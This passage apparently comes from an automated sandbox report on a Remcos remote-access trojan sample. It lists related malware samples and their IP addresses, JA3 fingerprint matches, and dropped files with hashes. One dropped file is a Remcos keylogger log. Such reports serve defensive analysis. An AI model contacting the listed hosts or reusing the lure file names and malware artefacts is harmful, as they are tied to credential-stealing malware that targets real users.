                                                                  yPIOW6yoPi.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  bwYw3UUfy7.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  Material Requirments.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 178.237.33.50
                                                                  preliminary drawing.pif.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                  • 178.237.33.50
                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                  • 178.237.33.50
                                                                  173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                  • 178.237.33.50
                                                                  QUICKPACKETUSc2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  RFQ-20241230.pif.exeGet hashmaliciousRemcosBrowse
                                                                  • 173.211.106.233
                                                                  Suppliers_Data.pif.exeGet hashmaliciousRemcosBrowse
                                                                  • 173.211.106.233
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  RailProvides_nopump.exeGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  https://z97f4f2525fyg27.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 172.82.129.154
                                                                  9W9jJCj9EV.batGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0e6uPVRnocVS.exeGet hashmaliciousDCRatBrowse
                                                                  • 193.26.115.39
                                                                  Udzp7lL5ns.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  • 193.26.115.39
                                                                  c2.htaGet hashmaliciousRemcosBrowse
                                                                  • 193.26.115.39
                                                                  nfKqna8HuC.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.26.115.39
                                                                  kAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 193.26.115.39
                                                                  mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.26.115.39
                                                                  Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                  • 193.26.115.39
                                                                  dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 193.26.115.39
                                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.26.115.39
                                                                  x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.26.115.39

                                                                  Dropped Files

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comc2.htaGet hashmaliciousRemcosBrowse
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                          Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                            random.exeGet hashmaliciousLummaC StealerBrowse
                                                                              HouseholdsClicking.exeGet hashmaliciousLummaCBrowse
                                                                                DodSussex.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  DangerousMidlands.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    PortugalForum_nopump.exeGet hashmaliciousUnknownBrowse

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\remcos\logs.dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):144
                                                                                      Entropy (8bit):3.365630494294252
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:rglsPlqlNaVrCl55JWRal2Jl+7R0DAlBG45klovDl6v:MlsPleNa0l55YcIeeDAlOWAv
                                                                                      MD5:45B27503AD0103128F9F7B21285BCF2E
                                                                                      SHA1:F01B610CC5506BF62E439CB0F930FE5F94378B7E
                                                                                      SHA-256:4359FE5974245097D319928CA60D57F534C444D4A16FD99FA79EA2D6CB9B303A
                                                                                      SHA-512:F9ADB8EEE56F8D8DB646D487638AF3ECF42396C42B1E85FF00531B8232DD88923C2A4516694042C8AEE408C5B5A8E019DAF74BB9DFB25036DC4E99C7D27108C3
                                                                                      Malicious:true
                                                                                      Preview:....[.2.0.2.5./.0.1./.1.1. .1.6.:.5.4.:.0.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.200347384526533
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZeZnQyq2Pwkn2nKuAl9OmbnIFUtDecG1ZmwVecQRkwOwkn2nKuAl9OmbjLJ:74ZQyvYfHAahFUtScg/McQR5JfHAaSJ
                                                                                      MD5:CC5B1B2873A60E94030DCDF0C5741EC4
                                                                                      SHA1:EEA597788DFD352C60080EB97F950E5320E05632
                                                                                      SHA-256:BB744BC4816ADA64FAA853AFB8A48E347F4550D36FB13B942D68CE99C01E9B26
                                                                                      SHA-512:F76C2D6F7839127E87E9F38FA61D7309009FB0B2BB50AE8ADAB3C01BF5A000170034CBCC2D1D9A2B8A2617ACD9DEC89388E975A179766A6AF9F299D4D2B3BECC
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:03.991 1f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/11-16:53:03.994 1f90 Recovering log #3.2025/01/11-16:53:03.994 1f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):292
                                                                                      Entropy (8bit):5.200347384526533
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZeZnQyq2Pwkn2nKuAl9OmbnIFUtDecG1ZmwVecQRkwOwkn2nKuAl9OmbjLJ:74ZQyvYfHAahFUtScg/McQR5JfHAaSJ
                                                                                      MD5:CC5B1B2873A60E94030DCDF0C5741EC4
                                                                                      SHA1:EEA597788DFD352C60080EB97F950E5320E05632
                                                                                      SHA-256:BB744BC4816ADA64FAA853AFB8A48E347F4550D36FB13B942D68CE99C01E9B26
                                                                                      SHA-512:F76C2D6F7839127E87E9F38FA61D7309009FB0B2BB50AE8ADAB3C01BF5A000170034CBCC2D1D9A2B8A2617ACD9DEC89388E975A179766A6AF9F299D4D2B3BECC
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:03.991 1f90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/11-16:53:03.994 1f90 Recovering log #3.2025/01/11-16:53:03.994 1f90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):333
                                                                                      Entropy (8bit):5.164399112142111
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZnQv39+q2Pwkn2nKuAl9Ombzo2jMGIFUtDnQHZmwVnQnVkwOwkn2nKuAl9OmbX:7e34vYfHAa8uFUta/45JfHAa8RJ
                                                                                      MD5:68FD737ED618E93B0B71FB7167BF8590
                                                                                      SHA1:173C3FFF805FF78625F1072265F0A3282C0C44B5
                                                                                      SHA-256:4BF4713F5C12B7593280DF666B984D6AF6ED8CF537AFC51DE6EE6EB1E52A5B74
                                                                                      SHA-512:326813228B6ADE71724B49D597F954EB45CA4716A2DCA062BEFDB34BB9B0E99000CFB5780F55E65CA7DCB37127EEF99171FAA008806B5760EC9C6144969836BE
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:04.052 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/11-16:53:04.054 ea8 Recovering log #3.2025/01/11-16:53:04.054 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):333
                                                                                      Entropy (8bit):5.164399112142111
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZnQv39+q2Pwkn2nKuAl9Ombzo2jMGIFUtDnQHZmwVnQnVkwOwkn2nKuAl9OmbX:7e34vYfHAa8uFUta/45JfHAa8RJ
                                                                                      MD5:68FD737ED618E93B0B71FB7167BF8590
                                                                                      SHA1:173C3FFF805FF78625F1072265F0A3282C0C44B5
                                                                                      SHA-256:4BF4713F5C12B7593280DF666B984D6AF6ED8CF537AFC51DE6EE6EB1E52A5B74
                                                                                      SHA-512:326813228B6ADE71724B49D597F954EB45CA4716A2DCA062BEFDB34BB9B0E99000CFB5780F55E65CA7DCB37127EEF99171FAA008806B5760EC9C6144969836BE
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:04.052 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/11-16:53:04.054 ea8 Recovering log #3.2025/01/11-16:53:04.054 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.9655162853550765
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqjGXYxsBdOg2H6caq3QYiubInP7E4T3y:Y2sRdstXYidMH13QYhbG7nby
                                                                                      MD5:EC95B54E0D5F9061BB0F405C2483A447
                                                                                      SHA1:1458865A8601FF91B71359B7ECF3B8158EFA5FBB
                                                                                      SHA-256:902AD4F93324EB3DD68DC2AF0291E966DBE4907337C2ACC5C5E2C6CB7C738B90
                                                                                      SHA-512:70A740C8A54697E72EBB686D94133863FA1F8A291854A5EBF4CE54DC0402A4EB77862F0472AE188E363FFCFAE71C8A2F0095DBE5D75CE746FAE4EC8A39685C6E
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381192395772480","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":131885},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\dce094b4-7397-426d-b360-4971d9413f7a.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:modified
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.9655162853550765
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqjGXYxsBdOg2H6caq3QYiubInP7E4T3y:Y2sRdstXYidMH13QYhbG7nby
                                                                                      MD5:EC95B54E0D5F9061BB0F405C2483A447
                                                                                      SHA1:1458865A8601FF91B71359B7ECF3B8158EFA5FBB
                                                                                      SHA-256:902AD4F93324EB3DD68DC2AF0291E966DBE4907337C2ACC5C5E2C6CB7C738B90
                                                                                      SHA-512:70A740C8A54697E72EBB686D94133863FA1F8A291854A5EBF4CE54DC0402A4EB77862F0472AE188E363FFCFAE71C8A2F0095DBE5D75CE746FAE4EC8A39685C6E
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381192395772480","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":131885},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4320
                                                                                      Entropy (8bit):5.25708361936938
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7BFIY:etJCV4FiN/jTN/2r8Mta02fEhgO73gol
                                                                                      MD5:04782DB1912329AA8ED5C65E8B4343B6
                                                                                      SHA1:EF805E3B6A1C0A2A7C7411345CA4BFE036754CE8
                                                                                      SHA-256:A2EC3C4CE6530D1F0989699CFDFDD1412848206E407943D1099D5EA0D38E8E24
                                                                                      SHA-512:D143C1074E388D0F9C363A2C8D61EAA56CD3645FB633C32F73A46C37061028A5DED1C11C6B1A9698415EA3A9AC7AB486A734A1EDFE4C37395A60F93A4590E149
                                                                                      Malicious:false
                                                                                      Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):321
                                                                                      Entropy (8bit):5.205365324418751
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZhWp39+q2Pwkn2nKuAl9OmbzNMxIFUtDhwXJZmwVhS2hX9VkwOwkn2nKuAl9Ob:7fm4vYfHAa8jFUttE/rF5JfHAa84J
                                                                                      MD5:A8D870E07A5F332311AE7563AAA80E15
                                                                                      SHA1:577CB1CB88D3F9A6F6727E766437EA9AA66DF007
                                                                                      SHA-256:AA80A90730E8B999157C0D557A8F2F42A39513989165E6B4ECC59B20341A839C
                                                                                      SHA-512:6F0C2346EB4BA18684E63065B43962BF6112E38F9A588CAE8469D2AD8DC85B53AB34FB5BEA3E3B9142BBF355419CD51D059F5696DE0A6A65DD866DC6617A3184
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:04.630 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/11-16:53:04.667 ea8 Recovering log #3.2025/01/11-16:53:04.677 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):321
                                                                                      Entropy (8bit):5.205365324418751
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:iOZhWp39+q2Pwkn2nKuAl9OmbzNMxIFUtDhwXJZmwVhS2hX9VkwOwkn2nKuAl9Ob:7fm4vYfHAa8jFUttE/rF5JfHAa84J
                                                                                      MD5:A8D870E07A5F332311AE7563AAA80E15
                                                                                      SHA1:577CB1CB88D3F9A6F6727E766437EA9AA66DF007
                                                                                      SHA-256:AA80A90730E8B999157C0D557A8F2F42A39513989165E6B4ECC59B20341A839C
                                                                                      SHA-512:6F0C2346EB4BA18684E63065B43962BF6112E38F9A588CAE8469D2AD8DC85B53AB34FB5BEA3E3B9142BBF355419CD51D059F5696DE0A6A65DD866DC6617A3184
                                                                                      Malicious:false
                                                                                      Preview:2025/01/11-16:53:04.630 ea8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/11-16:53:04.667 ea8 Recovering log #3.2025/01/11-16:53:04.677 ea8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250111215308Z-199.bmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):71190
                                                                                      Entropy (8bit):0.8418671210517596
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sUN7PgaFJ8+qGHJMojKfSABQs9CYVM6ZqJ:lN7PgaFJRpM9SQ9ZO6S
                                                                                      MD5:933F69148EC45D9BE56D7063450F1E63
                                                                                      SHA1:DEB748BA75E554DF6DA9A1D89845A4B2F06F7ED5
                                                                                      SHA-256:6F21ED09C2F9482741E3496F85B3505F4732EF58E202AAC13D0C43AED9175074
                                                                                      SHA-512:13961034EF9C7B9BAFBAA607D40B1CFD1B2D260514D480F16929CEC866432C1998BB426DF4A4E3784FCCD958817C7BF727BDC36A3927C40D1F3140FDDD170809
                                                                                      Malicious:false
                                                                                      Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                      Category:dropped
                                                                                      Size (bytes):86016
                                                                                      Entropy (8bit):4.445059441729332
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:yezci5tIiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rvs3OazzU89UTTgUL
                                                                                      MD5:ABAC6CA023792DF42D8EE3DB3EB53FA6
                                                                                      SHA1:910D6F65F9C048DDE34636DE2D725531EFD346B8
                                                                                      SHA-256:C98C66251C2EEF7BB582B8FC064CDEC4D313D5523C177F8F35E9180C5DBA8951
                                                                                      SHA-512:F75817C02F73599D4298B380A35A157CEF467778A14ABA69979074496E85C105F17FAEDAE86D8DE18E9D7A0A7738D484ED84A31DD45F2F4299ECCA8FF9456AB0
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):3.775089421777971
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:7M6p/E2ioyVuioy9oWoy1Cwoy1+KOioy1noy1AYoy1Wioy1hioybioyMoy1noy1q:7dpjuuFlXKQJAb9IVXEBodRBkD
                                                                                      MD5:D75227495672BEE76D0A3B973168208E
                                                                                      SHA1:709EE0A3AE4570371FE1249536DA7BED8807E41C
                                                                                      SHA-256:BA46C99F98AE6BC5D60390170FE03316BF9DE26E4A90AED06AF55DFF31E57758
                                                                                      SHA-512:0F3471969744D5485A24D6E27FA4B2BB2E88689E3999E7B5CF251629D1FB579C71372FD07247026BE3B94933E809F7A1404D73E1CC76134E29535545AF104185
                                                                                      Malicious:false
                                                                                      Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Certificate, Version=3
                                                                                      Category:dropped
                                                                                      Size (bytes):1391
                                                                                      Entropy (8bit):7.705940075877404
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                      Malicious:false
                                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                      Category:dropped
                                                                                      Size (bytes):71954
                                                                                      Entropy (8bit):7.996617769952133
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                      Malicious:false
                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):192
                                                                                      Entropy (8bit):2.732136534099206
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:kkFkljUltfllXlE/HT8k5pll7l1NNX8RolJuRdxLlGB9lQRYwpDdt:kK/leT8wp/7VNMa8RdWBwRd
                                                                                      MD5:B6BF8AAF71CBD521930999D405310A3C
                                                                                      SHA1:0B27B477A01E301B0AF9CC0BC1AEEFEDDEE747A0
                                                                                      SHA-256:DC3BECB9106BB55C124DFD030E1CC4608E916B1A2BC0630C7DBF4C715A95EF95
                                                                                      SHA-512:87F30784FB025986BD27145E393D371B7FBC0470E12CD64DA3EE83B3E7583ECE7FA9CBFB5DA1E86F7580175765650A5BC871454C987E4E217F9C6AF8B52CE812
                                                                                      Malicious:false
                                                                                      Preview:p...... ..........5sd..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):328
